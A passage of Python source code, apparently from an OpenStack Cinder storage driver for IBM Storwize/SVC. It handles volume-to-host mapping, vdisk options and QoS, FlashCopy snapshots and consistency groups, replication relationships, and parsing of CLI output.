if n > index:
result_lun = str(index)
break
self.ssh.mkvdiskhostmap(host_name, volume_name, result_lun,
multihostmap)
LOG.debug('Leave: map_vol_to_host: LUN %(result_lun)s, volume '
'%(volume_name)s, host %(host_name)s.',
{'result_lun': result_lun,
'volume_name': volume_name,
'host_name': host_name})
return int(result_lun)
def unmap_vol_from_host(self, volume_name, host_name):
"""Unmap the volume and delete the host if it has no more mappings."""
LOG.debug('Enter: unmap_vol_from_host: volume %(volume_name)s from '
'host %(host_name)s.',
{'volume_name': volume_name, 'host_name': host_name})
# Check if the mapping exists
resp = self.ssh.lsvdiskhostmap(volume_name)
if not len(resp):
LOG.warning(_LW('unmap_vol_from_host: No mapping of volume '
'%(vol_name)s to any host found.'),
{'vol_name': volume_name})
return
if host_name is None:
if len(resp) > 1:
LOG.warning(_LW('unmap_vol_from_host: Multiple mappings of '
'volume %(vol_name)s found, no host '
'specified.'), {'vol_name': volume_name})
return
else:
host_name = resp[0]['host_name']
else:
found = False
for h in resp.select('host_name'):
if h == host_name:
found = True
if not found:
LOG.warning(_LW('unmap_vol_from_host: No mapping of volume '
'%(vol_name)s to host %(host)s found.'),
{'vol_name': volume_name, 'host': host_name})
# We now know that the mapping exists
self.ssh.rmvdiskhostmap(host_name, volume_name)
LOG.debug('Leave: unmap_vol_from_host: volume %(volume_name)s from '
'host %(host_name)s.',
{'volume_name': volume_name, 'host_name': host_name})
return host_name
def check_host_mapped_vols(self, host_name):
return self.ssh.lshostvdiskmap(host_name)
@staticmethod
def build_default_opts(config):
# Ignore capitalization
cluster_partner = config.storwize_svc_stretched_cluster_partner
opt = {'rsize': config.storwize_svc_vol_rsize,
'warning': config.storwize_svc_vol_warning,
'autoexpand': config.storwize_svc_vol_autoexpand,
'grainsize': config.storwize_svc_vol_grainsize,
'compression': config.storwize_svc_vol_compression,
'easytier': config.storwize_svc_vol_easytier,
'iogrp': config.storwize_svc_vol_iogrp,
'qos': None,
'stretched_cluster': cluster_partner,
'replication': False,
'nofmtdisk': config.storwize_svc_vol_nofmtdisk}
return opt
@staticmethod
def check_vdisk_opts(state, opts):
# Check that grainsize is 32/64/128/256
if opts['grainsize'] not in [32, 64, 128, 256]:
raise exception.InvalidInput(
reason=_('Illegal value specified for '
'storwize_svc_vol_grainsize: set to either '
'32, 64, 128, or 256.'))
# Check that compression is supported
if opts['compression'] and not state['compression_enabled']:
raise exception.InvalidInput(
reason=_('System does not support compression.'))
# Check that rsize is set if compression is set
if opts['compression'] and opts['rsize'] == -1:
raise exception.InvalidInput(
reason=_('If compression is set to True, rsize must '
'also be set (not equal to -1).'))
if opts['iogrp'] not in state['available_iogrps']:
avail_grps = ''.join(str(e) for e in state['available_iogrps'])
raise exception.InvalidInput(
reason=_('I/O group %(iogrp)d is not valid; available '
'I/O groups are %(avail)s.')
% {'iogrp': opts['iogrp'],
'avail': avail_grps})
if opts['nofmtdisk'] and opts['rsize'] != -1:
raise exception.InvalidInput(
reason=_('If nofmtdisk is set to True, rsize must '
'also be set to -1.'))
def _get_opts_from_specs(self, opts, specs):
qos = {}
for k, value in specs.items():
# Get the scope, if using scope format
key_split = k.split(':')
if len(key_split) == 1:
scope = None
key = key_split[0]
else:
scope = key_split[0]
key = key_split[1]
# We generally do not look at capabilities in the driver, but
# replication is a special case where the user asks for
# a volume to be replicated, and we want both the scheduler and
# the driver to act on the value.
if ((not scope or scope == 'capabilities') and
key == 'replication'):
scope = None
key = 'replication'
words = value.split()
if not (words and len(words) == 2 and words[0] == '<is>'):
LOG.error(_LE('Replication must be specified as '
'\'<is> True\' or \'<is> False\'.'))
del words[0]
value = words[0]
# Add the QoS.
if scope and scope == 'qos':
if key in self.svc_qos_keys.keys():
try:
type_fn = self.svc_qos_keys[key]['type']
value = type_fn(value)
qos[key] = value
except ValueError:
continue
# Any keys that the driver should look at should have the
# 'drivers' scope.
if scope and scope != 'drivers':
continue
if key in opts:
this_type = type(opts[key]).__name__
if this_type == 'int':
value = int(value)
elif this_type == 'bool':
value = strutils.bool_from_string(value)
opts[key] = value
if len(qos) != 0:
opts['qos'] = qos
return opts
def _get_qos_from_volume_metadata(self, volume_metadata):
"""Return the QoS information from the volume metadata."""
qos = {}
for i in volume_metadata:
k = i.get('key', None)
value = i.get('value', None)
key_split = k.split(':')
if len(key_split) == 1:
scope = None
key = key_split[0]
else:
scope = key_split[0]
key = key_split[1]
# Add the QoS.
if scope and scope == 'qos':
if key in self.svc_qos_keys.keys():
try:
type_fn = self.svc_qos_keys[key]['type']
value = type_fn(value)
qos[key] = value
except ValueError:
continue
return qos
def _wait_for_a_condition(self, testmethod, timeout=None,
interval=INTERVAL_1_SEC):
start_time = time.time()
if timeout is None:
timeout = DEFAULT_TIMEOUT
def _inner():
try:
testValue = testmethod()
except Exception as ex:
testValue = False
LOG.debug('Helper.'
'_wait_for_condition: %(method_name)s '
'execution failed for %(exception)s.',
{'method_name': testmethod.__name__,
'exception': ex.message})
if testValue:
raise loopingcall.LoopingCallDone()
if int(time.time()) - start_time > timeout:
msg = (_('CommandLineHelper._wait_for_condition: %s timeout.')
% testmethod.__name__)
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
timer = loopingcall.FixedIntervalLoopingCall(_inner)
timer.start(interval=interval).wait()
def get_vdisk_params(self, config, state, type_id,
volume_type=None, volume_metadata=None):
"""Return the parameters for creating the vdisk.
Takes volume type and defaults from config options into account.
"""
opts = self.build_default_opts(config)
ctxt = context.get_admin_context()
if volume_type is None and type_id is not None:
volume_type = volume_types.get_volume_type(ctxt, type_id)
if volume_type:
qos_specs_id = volume_type.get('qos_specs_id')
specs = dict(volume_type).get('extra_specs')
# NOTE(vhou): We prefer the qos_specs association
# and over-ride any existing
# extra-specs settings if present
if qos_specs_id is not None:
kvs = qos_specs.get_qos_specs(ctxt, qos_specs_id)['specs']
# Merge the qos_specs into extra_specs and qos_specs has higher
# priority than extra_specs if they have different values for
# the same key.
specs.update(kvs)
opts = self._get_opts_from_specs(opts, specs)
if (opts['qos'] is None and config.storwize_svc_allow_tenant_qos
and volume_metadata):
qos = self._get_qos_from_volume_metadata(volume_metadata)
if len(qos) != 0:
opts['qos'] = qos
self.check_vdisk_opts(state, opts)
return opts
@staticmethod
def _get_vdisk_create_params(opts):
easytier = 'on' if opts['easytier'] else 'off'
if opts['rsize'] == -1:
params = []
if opts['nofmtdisk']:
params.append('-nofmtdisk')
else:
params = ['-rsize', '%s%%' % str(opts['rsize']),
'-autoexpand', '-warning',
'%s%%' % str(opts['warning'])]
if not opts['autoexpand']:
params.remove('-autoexpand')
if opts['compression']:
params.append('-compressed')
else:
params.extend(['-grainsize', str(opts['grainsize'])])
params.extend(['-easytier', easytier])
return params
def create_vdisk(self, name, size, units, pool, opts):
LOG.debug('Enter: create_vdisk: vdisk %s.', name)
params = self._get_vdisk_create_params(opts)
self.ssh.mkvdisk(name, size, units, pool, opts, params)
LOG.debug('Leave: _create_vdisk: volume %s.', name)
def get_vdisk_attributes(self, vdisk):
attrs = self.ssh.lsvdisk(vdisk)
return attrs
def is_vdisk_defined(self, vdisk_name):
"""Check if vdisk is defined."""
attrs = self.get_vdisk_attributes(vdisk_name)
return attrs is not None
def find_vdisk_copy_id(self, vdisk, pool):
resp = self.ssh.lsvdiskcopy(vdisk)
for copy_id, mdisk_grp in resp.select('copy_id', 'mdisk_grp_name'):
if mdisk_grp == pool:
return copy_id
msg = _('Failed to find a vdisk copy in the expected pool.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def get_vdisk_copy_attrs(self, vdisk, copy_id):
return self.ssh.lsvdiskcopy(vdisk, copy_id=copy_id)[0]
def get_vdisk_copies(self, vdisk):
copies = {'primary': None,
'secondary': None}
resp = self.ssh.lsvdiskcopy(vdisk)
for copy_id, status, sync, primary, mdisk_grp in (
resp.select('copy_id', 'status', 'sync',
'primary', 'mdisk_grp_name')):
copy = {'copy_id': copy_id,
'status': status,
'sync': sync,
'primary': primary,
'mdisk_grp_name': mdisk_grp,
'sync_progress': None}
if copy['sync'] != 'yes':
progress_info = self.ssh.lsvdisksyncprogress(vdisk, copy_id)
copy['sync_progress'] = progress_info['progress']
if copy['primary'] == 'yes':
copies['primary'] = copy
else:
copies['secondary'] = copy
return copies
def _prepare_fc_map(self, fc_map_id, timeout):
self.ssh.prestartfcmap(fc_map_id)
mapping_ready = False
wait_time = 5
max_retries = (timeout // wait_time) + 1
for try_number in range(1, max_retries):
mapping_attrs = self._get_flashcopy_mapping_attributes(fc_map_id)
if (mapping_attrs is None or
'status' not in mapping_attrs):
break
if mapping_attrs['status'] == 'prepared':
mapping_ready = True
break
elif mapping_attrs['status'] == 'stopped':
self.ssh.prestartfcmap(fc_map_id)
elif mapping_attrs['status'] != 'preparing':
msg = (_('Unexecpted mapping status %(status)s for mapping '
'%(id)s. Attributes: %(attr)s.')
% {'status': mapping_attrs['status'],
'id': fc_map_id,
'attr': mapping_attrs})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
greenthread.sleep(wait_time)
if not mapping_ready:
msg = (_('Mapping %(id)s prepare failed to complete within the'
'allotted %(to)d seconds timeout. Terminating.')
% {'id': fc_map_id,
'to': timeout})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def start_fc_consistgrp(self, fc_consistgrp):
self.ssh.startfcconsistgrp(fc_consistgrp)
def create_fc_consistgrp(self, fc_consistgrp):
self.ssh.mkfcconsistgrp(fc_consistgrp)
def delete_fc_consistgrp(self, fc_consistgrp):
self.ssh.rmfcconsistgrp(fc_consistgrp)
def stop_fc_consistgrp(self, fc_consistgrp):
self.ssh.stopfcconsistgrp(fc_consistgrp)
def run_consistgrp_snapshots(self, fc_consistgrp, snapshots, state,
config, timeout):
cgsnapshot = {'status': 'available'}
try:
for snapshot in snapshots:
opts = self.get_vdisk_params(config, state,
snapshot['volume_type_id'])
self.create_flashcopy_to_consistgrp(snapshot['volume_name'],
snapshot['name'],
fc_consistgrp,
config, opts)
snapshot['status'] = 'available'
self.prepare_fc_consistgrp(fc_consistgrp, timeout)
self.start_fc_consistgrp(fc_consistgrp)
# There is CG limitation that could not create more than 128 CGs.
# After start CG, we delete CG to avoid CG limitation.
# Cinder general will maintain the CG and snapshots relationship.
self.delete_fc_consistgrp(fc_consistgrp)
except exception.VolumeBackendAPIException as err:
for snapshot in snapshots:
snapshot['status'] = 'error'
cgsnapshot['status'] = 'error'
# Release cg
self.delete_fc_consistgrp(fc_consistgrp)
LOG.error(_LE("Failed to create CGSnapshot. "
"Exception: %s."), err)
return cgsnapshot, snapshots
def delete_consistgrp_snapshots(self, fc_consistgrp, snapshots):
"""Delete flashcopy maps and consistent group."""
cgsnapshot = {'status': 'available'}
try:
for snapshot in snapshots:
self.ssh.rmvdisk(snapshot['name'], True)
snapshot['status'] = 'deleted'
except exception.VolumeBackendAPIException as err:
for snapshot in snapshots:
snapshot['status'] = 'error_deleting'
cgsnapshot['status'] = 'error_deleting'
LOG.error(_LE("Failed to delete the snapshot %(snap)s of "
"CGSnapshot. Exception: %(exception)s."),
{'snap': snapshot['name'], 'exception': err})
return cgsnapshot, snapshots
def prepare_fc_consistgrp(self, fc_consistgrp, timeout):
"""Prepare FC Consistency Group."""
self.ssh.prestartfcconsistgrp(fc_consistgrp)
def prepare_fc_consistgrp_success():
mapping_ready = False
mapping_attrs = self._get_flashcopy_consistgrp_attr(fc_consistgrp)
if (mapping_attrs is None or
'status' not in mapping_attrs):
pass
if mapping_attrs['status'] == 'prepared':
mapping_ready = True
elif mapping_attrs['status'] == 'stopped':
self.ssh.prestartfcconsistgrp(fc_consistgrp)
elif mapping_attrs['status'] != 'preparing':
msg = (_('Unexpected mapping status %(status)s for mapping'
'%(id)s. Attributes: %(attr)s.') %
{'status': mapping_attrs['status'],
'id': fc_consistgrp,
'attr': mapping_attrs})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return mapping_ready
self._wait_for_a_condition(prepare_fc_consistgrp_success, timeout)
def create_cg_from_source(self, group, fc_consistgrp,
sources, targets, state,
config, timeout):
"""Create consistence group from source"""
LOG.debug('Enter: create_cg_from_source: cg %(cg)s'
' source %(source)s, target %(target)s',
{'cg': fc_consistgrp, 'source': sources, 'target': targets})
model_update = {'status': fields.ConsistencyGroupStatus.AVAILABLE}
ctxt = context.get_admin_context()
try:
for source, target in zip(sources, targets):
opts = self.get_vdisk_params(config, state,
source['volume_type_id'])
pool = utils.extract_host(target['host'], 'pool')
self.create_flashcopy_to_consistgrp(source['name'],
target['name'],
fc_consistgrp,
config, opts,
True, pool=pool)
self.prepare_fc_consistgrp(fc_consistgrp, timeout)
self.start_fc_consistgrp(fc_consistgrp)
self.delete_fc_consistgrp(fc_consistgrp)
volumes_model_update = self._get_volume_model_updates(
ctxt, targets, group['id'], model_update['status'])
except exception.VolumeBackendAPIException as err:
model_update['status'] = fields.ConsistencyGroupStatus.ERROR
volumes_model_update = self._get_volume_model_updates(
ctxt, targets, group['id'], model_update['status'])
with excutils.save_and_reraise_exception():
# Release cg
self.delete_fc_consistgrp(fc_consistgrp)
LOG.error(_LE("Failed to create CG from CGsnapshot. "
"Exception: %s"), err)
return model_update, volumes_model_update
LOG.debug('Leave: create_cg_from_source.')
return model_update, volumes_model_update
def _get_volume_model_updates(self, ctxt, volumes, cgId,
status='available'):
"""Update the volume model's status and return it."""
volume_model_updates = []
LOG.info(_LI(
"Updating status for CG: %(id)s."),
{'id': cgId})
if volumes:
for volume in volumes:
volume_model_updates.append({'id': volume['id'],
'status': status})
else:
LOG.info(_LI("No volume found for CG: %(cg)s."),
{'cg': cgId})
return volume_model_updates
def run_flashcopy(self, source, target, timeout, copy_rate,
full_copy=True):
"""Create a FlashCopy mapping from the source to the target."""
LOG.debug('Enter: run_flashcopy: execute FlashCopy from source '
'%(source)s to target %(target)s.',
{'source': source, 'target': target})
fc_map_id = self.ssh.mkfcmap(source, target, full_copy, copy_rate)
self._prepare_fc_map(fc_map_id, timeout)
self.ssh.startfcmap(fc_map_id)
LOG.debug('Leave: run_flashcopy: FlashCopy started from '
'%(source)s to %(target)s.',
{'source': source, 'target': target})
def create_flashcopy_to_consistgrp(self, source, target, consistgrp,
config, opts, full_copy=False,
pool=None):
"""Create a FlashCopy mapping and add to consistent group."""
LOG.debug('Enter: create_flashcopy_to_consistgrp: create FlashCopy'
' from source %(source)s to target %(target)s'
'Then add the flashcopy to %(cg)s.',
{'source': source, 'target': target, 'cg': consistgrp})
src_attrs = self.get_vdisk_attributes(source)
if src_attrs is None:
msg = (_('create_copy: Source vdisk %(src)s '
'does not exist.') % {'src': source})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
src_size = src_attrs['capacity']
# In case we need to use a specific pool
if not pool:
pool = src_attrs['mdisk_grp_name']
self.create_vdisk(target, src_size, 'b', pool, opts)
self.ssh.mkfcmap(source, target, full_copy,
config.storwize_svc_flashcopy_rate,
consistgrp=consistgrp)
LOG.debug('Leave: create_flashcopy_to_consistgrp: '
'FlashCopy started from %(source)s to %(target)s.',
{'source': source, 'target': target})
def _get_vdisk_fc_mappings(self, vdisk):
"""Return FlashCopy mappings that this vdisk is associated with."""
mapping_ids = []
resp = self.ssh.lsvdiskfcmappings(vdisk)
for id in resp.select('id'):
mapping_ids.append(id)
return mapping_ids
def _get_flashcopy_mapping_attributes(self, fc_map_id):
resp = self.ssh.lsfcmap(fc_map_id)
if not len(resp):
return None
return resp[0]
def _get_flashcopy_consistgrp_attr(self, fc_map_id):
resp = self.ssh.lsfcconsistgrp(fc_map_id)
if not len(resp):
return None
return resp[0]
def _check_vdisk_fc_mappings(self, name, allow_snaps=True):
"""FlashCopy mapping check helper."""
LOG.debug('Loopcall: _check_vdisk_fc_mappings(), vdisk %s.', name)
mapping_ids = self._get_vdisk_fc_mappings(name)
wait_for_copy = False
for map_id in mapping_ids:
attrs = self._get_flashcopy_mapping_attributes(map_id)
if not attrs:
continue
source = attrs['source_vdisk_name']
target = attrs['target_vdisk_name']
copy_rate = attrs['copy_rate']
status = attrs['status']
if copy_rate == '0':
if source == name:
# Vdisk with snapshots. Return False if snapshot
# not allowed.
if not allow_snaps:
raise loopingcall.LoopingCallDone(retvalue=False)
self.ssh.chfcmap(map_id, copyrate='50', autodel='on')
wait_for_copy = True
else:
# A snapshot
if target != name:
msg = (_('Vdisk %(name)s not involved in '
'mapping %(src)s -> %(tgt)s.') %
{'name': name, 'src': source, 'tgt': target})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if status in ['copying', 'prepared']:
self.ssh.stopfcmap(map_id)
# Need to wait for the fcmap to change to
# stopped state before remove fcmap
wait_for_copy = True
elif status in ['stopping', 'preparing']:
wait_for_copy = True
else:
self.ssh.rmfcmap(map_id)
# Case 4: Copy in progress - wait and will autodelete
else:
if status == 'prepared':
self.ssh.stopfcmap(map_id)
self.ssh.rmfcmap(map_id)
elif status == 'idle_or_copied':
# Prepare failed
self.ssh.rmfcmap(map_id)
else:
wait_for_copy = True
if not wait_for_copy or not len(mapping_ids):
raise loopingcall.LoopingCallDone(retvalue=True)
def ensure_vdisk_no_fc_mappings(self, name, allow_snaps=True):
"""Ensure vdisk has no flashcopy mappings."""
timer = loopingcall.FixedIntervalLoopingCall(
self._check_vdisk_fc_mappings, name, allow_snaps)
# Create a timer greenthread. The default volume service heart
# beat is every 10 seconds. The flashcopy usually takes hours
# before it finishes. Don't set the sleep interval shorter
# than the heartbeat. Otherwise volume service heartbeat
# will not be serviced.
LOG.debug('Calling _ensure_vdisk_no_fc_mappings: vdisk %s.',
name)
ret = timer.start(interval=self.check_fcmapping_interval).wait()
timer.stop()
return ret
def start_relationship(self, volume_name, primary=None):
vol_attrs = self.get_vdisk_attributes(volume_name)
if vol_attrs['RC_name']:
self.ssh.startrcrelationship(vol_attrs['RC_name'], primary)
def stop_relationship(self, volume_name):
vol_attrs = self.get_vdisk_attributes(volume_name)
if vol_attrs['RC_name']:
self.ssh.stoprcrelationship(vol_attrs['RC_name'], access=True)
def create_relationship(self, master, aux, system, asyncmirror):
name = 'rcrel' + ''.join(random.sample(string.digits, 10))
try:
rc_id = self.ssh.mkrcrelationship(master, aux, system, name,
asyncmirror)
except exception.VolumeBackendAPIException as e:
# CMMVC5959E is the code in Stowize storage, meaning that
# there is a relationship that already has this name on the
# master cluster.
if 'CMMVC5959E' not in e:
# If there is no relation between the primary and the
# secondary back-end storage, the exception is raised.
raise
if rc_id:
self.start_relationship(master)
def delete_relationship(self, volume_name):
vol_attrs = self.get_vdisk_attributes(volume_name)
if vol_attrs['RC_name']:
self.ssh.stoprcrelationship(vol_attrs['RC_name'])
self.ssh.rmrcrelationship(vol_attrs['RC_name'])
vol_attrs = self.get_vdisk_attributes(volume_name)
def get_relationship_info(self, volume):
vol_attrs = self.get_vdisk_attributes(volume['name'])
if not vol_attrs or not vol_attrs['RC_name']:
LOG.info(_LI("Unable to get remote copy information for "
"volume %s"), volume['name'])
return
relationship = self.ssh.lsrcrelationship(vol_attrs['RC_name'])
return relationship[0] if len(relationship) > 0 else None
def switch_relationship(self, relationship, aux=True):
self.ssh.switchrelationship(relationship, aux)
def get_partnership_info(self, system_name):
partnership = self.ssh.lspartnership(system_name)
return partnership[0] if len(partnership) > 0 else None
def get_partnershipcandidate_info(self, system_name):
candidates = self.ssh.lspartnershipcandidate()
for candidate in candidates:
if system_name == candidate['name']:
return candidate
return None
def mkippartnership(self, ip_v4, bandwith=1000):
self.ssh.mkippartnership(ip_v4, bandwith)
def mkfcpartnership(self, system_name, bandwith=1000):
self.ssh.mkfcpartnership(system_name, bandwith)
def startpartnership(self, partnership_id):
self.ssh.startpartnership(partnership_id)
def delete_vdisk(self, vdisk, force):
"""Ensures that vdisk is not part of FC mapping and deletes it."""
LOG.debug('Enter: delete_vdisk: vdisk %s.', vdisk)
if not self.is_vdisk_defined(vdisk):
LOG.info(_LI('Tried to delete non-existent vdisk %s.'), vdisk)
return
self.ensure_vdisk_no_fc_mappings(vdisk)
self.ssh.rmvdisk(vdisk, force=force)
LOG.debug('Leave: delete_vdisk: vdisk %s.', vdisk)
def create_copy(self, src, tgt, src_id, config, opts,
full_copy, pool=None):
"""Create a new snapshot using FlashCopy."""
LOG.debug('Enter: create_copy: snapshot %(src)s to %(tgt)s.',
{'tgt': tgt, 'src': src})
src_attrs = self.get_vdisk_attributes(src)
if src_attrs is None:
msg = (_('create_copy: Source vdisk %(src)s (%(src_id)s) '
'does not exist.') % {'src': src, 'src_id': src_id})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
src_size = src_attrs['capacity']
# In case we need to use a specific pool
if not pool:
pool = src_attrs['mdisk_grp_name']
self.create_vdisk(tgt, src_size, 'b', pool, opts)
timeout = config.storwize_svc_flashcopy_timeout
try:
self.run_flashcopy(src, tgt, timeout,
config.storwize_svc_flashcopy_rate,
full_copy=full_copy)
except Exception:
with excutils.save_and_reraise_exception():
self.delete_vdisk(tgt, True)
LOG.debug('Leave: _create_copy: snapshot %(tgt)s from '
'vdisk %(src)s.',
{'tgt': tgt, 'src': src})
def extend_vdisk(self, vdisk, amount):
self.ssh.expandvdisksize(vdisk, amount)
def add_vdisk_copy(self, vdisk, dest_pool, volume_type, state, config):
"""Add a vdisk copy in the given pool."""
resp = self.ssh.lsvdiskcopy(vdisk)
if len(resp) > 1:
msg = (_('add_vdisk_copy failed: A copy of volume %s exists. '
'Adding another copy would exceed the limit of '
'2 copies.') % vdisk)
raise exception.VolumeDriverException(message=msg)
orig_copy_id = resp[0].get("copy_id", None)
if orig_copy_id is None:
msg = (_('add_vdisk_copy started without a vdisk copy in the '
'expected pool.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if volume_type is None:
opts = self.get_vdisk_params(config, state, None)
else:
opts = self.get_vdisk_params(config, state, volume_type['id'],
volume_type=volume_type)
params = self._get_vdisk_create_params(opts)
new_copy_id = self.ssh.addvdiskcopy(vdisk, dest_pool, params)
return (orig_copy_id, new_copy_id)
def is_vdisk_copy_synced(self, vdisk, copy_id):
sync = self.ssh.lsvdiskcopy(vdisk, copy_id=copy_id)[0]['sync']
if sync == 'yes':
return True
return False
def rm_vdisk_copy(self, vdisk, copy_id):
self.ssh.rmvdiskcopy(vdisk, copy_id)
@staticmethod
def can_migrate_to_host(host, state):
if 'location_info' not in host['capabilities']:
return None
info = host['capabilities']['location_info']
try:
(dest_type, dest_id, dest_pool) = info.split(':')
except ValueError:
return None
if (dest_type != 'StorwizeSVCDriver' or dest_id != state['system_id']):
return None
return dest_pool
def add_vdisk_qos(self, vdisk, qos):
"""Add the QoS configuration to the volume."""
for key, value in qos.items():
if key in self.svc_qos_keys.keys():
param = self.svc_qos_keys[key]['param']
self.ssh.chvdisk(vdisk, ['-' + param, str(value)])
def update_vdisk_qos(self, vdisk, qos):
"""Update all the QoS in terms of a key and value.
svc_qos_keys saves all the supported QoS parameters. Going through
this dict, we set the new values to all the parameters. If QoS is
available in the QoS configuration, the value is taken from it;
if not, the value will be set to default.
"""
for key, value in self.svc_qos_keys.items():
param = value['param']
if key in qos.keys():
# If the value is set in QoS, take the value from
# the QoS configuration.
v = qos[key]
else:
# If not, set the value to default.
v = value['default']
self.ssh.chvdisk(vdisk, ['-' + param, str(v)])
def disable_vdisk_qos(self, vdisk, qos):
"""Disable the QoS."""
for key, value in qos.items():
if key in self.svc_qos_keys.keys():
param = self.svc_qos_keys[key]['param']
# Take the default value.
value = self.svc_qos_keys[key]['default']
self.ssh.chvdisk(vdisk, ['-' + param, value])
def change_vdisk_options(self, vdisk, changes, opts, state):
if 'warning' in opts:
opts['warning'] = '%s%%' % str(opts['warning'])
if 'easytier' in opts:
opts['easytier'] = 'on' if opts['easytier'] else 'off'
if 'autoexpand' in opts:
opts['autoexpand'] = 'on' if opts['autoexpand'] else 'off'
for key in changes:
self.ssh.chvdisk(vdisk, ['-' + key, opts[key]])
def change_vdisk_iogrp(self, vdisk, state, iogrp):
if state['code_level'] < (6, 4, 0, 0):
LOG.debug('Ignore change IO group as storage code level is '
'%(code_level)s, below the required 6.4.0.0.',
{'code_level': state['code_level']})
else:
self.ssh.movevdisk(vdisk, str(iogrp[0]))
self.ssh.addvdiskaccess(vdisk, str(iogrp[0]))
self.ssh.rmvdiskaccess(vdisk, str(iogrp[1]))
def vdisk_by_uid(self, vdisk_uid):
"""Returns the properties of the vdisk with the specified UID.
Returns None if no such disk exists.
"""
vdisks = self.ssh.lsvdisks_from_filter('vdisk_UID', vdisk_uid)
if len(vdisks) == 0:
return None
if len(vdisks) != 1:
msg = (_('Expected single vdisk returned from lsvdisk when '
'filtering on vdisk_UID. %(count)s were returned.') %
{'count': len(vdisks)})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
vdisk = vdisks.result[0]
return self.ssh.lsvdisk(vdisk['name'])
def is_vdisk_in_use(self, vdisk):
"""Returns True if the specified vdisk is mapped to at least 1 host."""
resp = self.ssh.lsvdiskhostmap(vdisk)
return len(resp) != 0
def rename_vdisk(self, vdisk, new_name):
self.ssh.chvdisk(vdisk, ['-name', new_name])
def change_vdisk_primary_copy(self, vdisk, copy_id):
self.ssh.chvdisk(vdisk, ['-primary', copy_id])
class CLIResponse(object):
"""Parse SVC CLI output and generate iterable."""
def __init__(self, raw, ssh_cmd=None, delim='!', with_header=True):
super(CLIResponse, self).__init__()
if ssh_cmd:
self.ssh_cmd = ' '.join(ssh_cmd)
else:
self.ssh_cmd = 'None'
self.raw = raw
self.delim = delim
self.with_header = with_header
self.result = self._parse()
def select(self, *keys):
for a in self.result:
vs = []
for k in keys:
v = a.get(k, None)
if isinstance(v, six.string_types) or v is None:
v = [v]
if isinstance(v, list):
vs.append(v)
for item in zip(*vs):
if len(item) == 1:
yield item[0]
else:
yield item
def __getitem__(self, key):
try:
return self.result[key]
except KeyError:
msg = (_('Did not find the expected key %(key)s in %(fun)s: '
'%(raw)s.') % {'key': key, 'fun': self.ssh_cmd,
'raw': self.raw})
raise exception.VolumeBackendAPIException(data=msg)
def __iter__(self):
for a in self.result:
yield a
def __len__(self):
return len(self.result)
def _parse(self):
def get_reader(content, delim):
for line in content.lstrip().splitlines():
line = line.strip()
if line:
yield line.split(delim)
else:
yield []
if isinstance(self.raw, six.string_types):
stdout, stderr = self.raw, ''
else:
stdout, stderr = self.raw
reader = get_reader(stdout, self.delim)
result = []
if self.with_header:
hds = tuple()
for row in reader:
hds = row
break
for row in reader:
cur = dict()
if len(hds) != len(row):
msg = (_('Unexpected CLI response: header/row mismatch. '
'header: %(header)s, row: %(row)s.')
% {'header': hds,
'row': row})
raise exception.VolumeBackendAPIException(data=msg)
for k, v in zip(hds, row):
CLIResponse.append_dict(cur, k, v)
result.append(cur)
else:
cur = dict()
for row in reader:
if row:
CLIResponse.append_dict(cur, row[0], ' '.join(row[1:]))
elif cur: # start new section
result.append(cur)
cur = dict()
if cur:
result.append(cur)
return result
@staticmethod
def append_dict(dict_, key, value):
key, value = key.strip(), value.strip()
obj = dict_.get(key, None)
if obj is None:
dict_[key] = value
elif isinstance(obj, list):
obj.append(value)
dict_[key] = obj
else:
dict_[key] = [obj, value]
return dict_
class StorwizeSVCCommonDriver(san.SanDriver,
driver.ManageableVD,
driver.ExtendVD, driver.SnapshotVD,
driver.MigrateVD, driver.ReplicaVD,
driver.ConsistencyGroupVD,
driver.CloneableImageVD,
driver.TransferVD):
"""IBM Storwize V7000 SVC abstract base class for iSCSI/FC volume drivers.
Version history:
1.0 - Initial driver
1.1 - FC support, create_cloned_volume, volume type support,
get_volume_stats, minor bug fixes
1.2.0 - Added retype
1.2.1 - Code refactor, improved exception handling
1.2.2 - Fix bug #1274123 (races in host-related functions)
1.2.3 - Fix Fibre Channel connectivity: bug #1279758 (add delim to
lsfabric, clear unused data from connections, ensure matching
WWPNs by comparing lower case
1.2.4 - Fix bug #1278035 (async migration/retype)
1.2.5 - Added support for manage_existing (unmanage is inherited)
1.2.6 - Added QoS support in terms of I/O throttling rate
1.3.1 - Added support for volume replication
1.3.2 - Added support for consistency group
1.3.3 - Update driver to use ABC metaclasses
2.0 - Code refactor, split init file and placed shared methods for
FC and iSCSI within the StorwizeSVCCommonDriver class
2.1 - Added replication V2 support to the global/metro mirror
mode
2.1.1 - Update replication to version 2.1
"""
VERSION = "2.1.1"
VDISKCOPYOPS_INTERVAL = 600
GLOBAL = 'global'
METRO = 'metro'
VALID_REP_TYPES = (GLOBAL, METRO)
FAILBACK_VALUE = 'default'
def __init__(self, *args, **kwargs):
super(StorwizeSVCCommonDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(storwize_svc_opts)
self._backend_name = self.configuration.safe_get('volume_backend_name')
self._helpers = StorwizeHelpers(self._run_ssh)
self._vdiskcopyops = {}
self._vdiskcopyops_loop = None
self.protocol = None
self.replication = None
self._state = {'storage_nodes': {},
'enabled_protocols': set(),
'compression_enabled': False,
'available_iogrps': [],
'system_name': None,
'system_id': None,
'code_level': None,
}
self._active_backend_id = kwargs.get('active_backend_id')
# Since there are three replication modes supported by Storwize,
# this dictionary is used to map the replication types to certain
# replications.
self.replications = {}
# One driver can be configured with multiple replication targets
# to failover.
self._replication_targets = []
# This boolean is used to indicate whether this driver is configured
# with replication.
self._replication_enabled = False
# This list is used to save the supported replication modes.
self._supported_replication_types = []
# Storwize has the limitation that can not burst more than 3 new ssh
# connections within 1 second. So slow down the initialization.
time.sleep(1)
def do_setup(self, ctxt):
"""Check that we have all configuration details from the storage."""
LOG.debug('enter: do_setup')
# Get storage system name, id, and code level
self._state.update(self._helpers.get_system_info())
# Get the replication helpers
self.replication = storwize_rep.StorwizeSVCReplication.factory(self)
# Validate that the pool exists
self._validate_pools_exist()
# Check if compression is supported
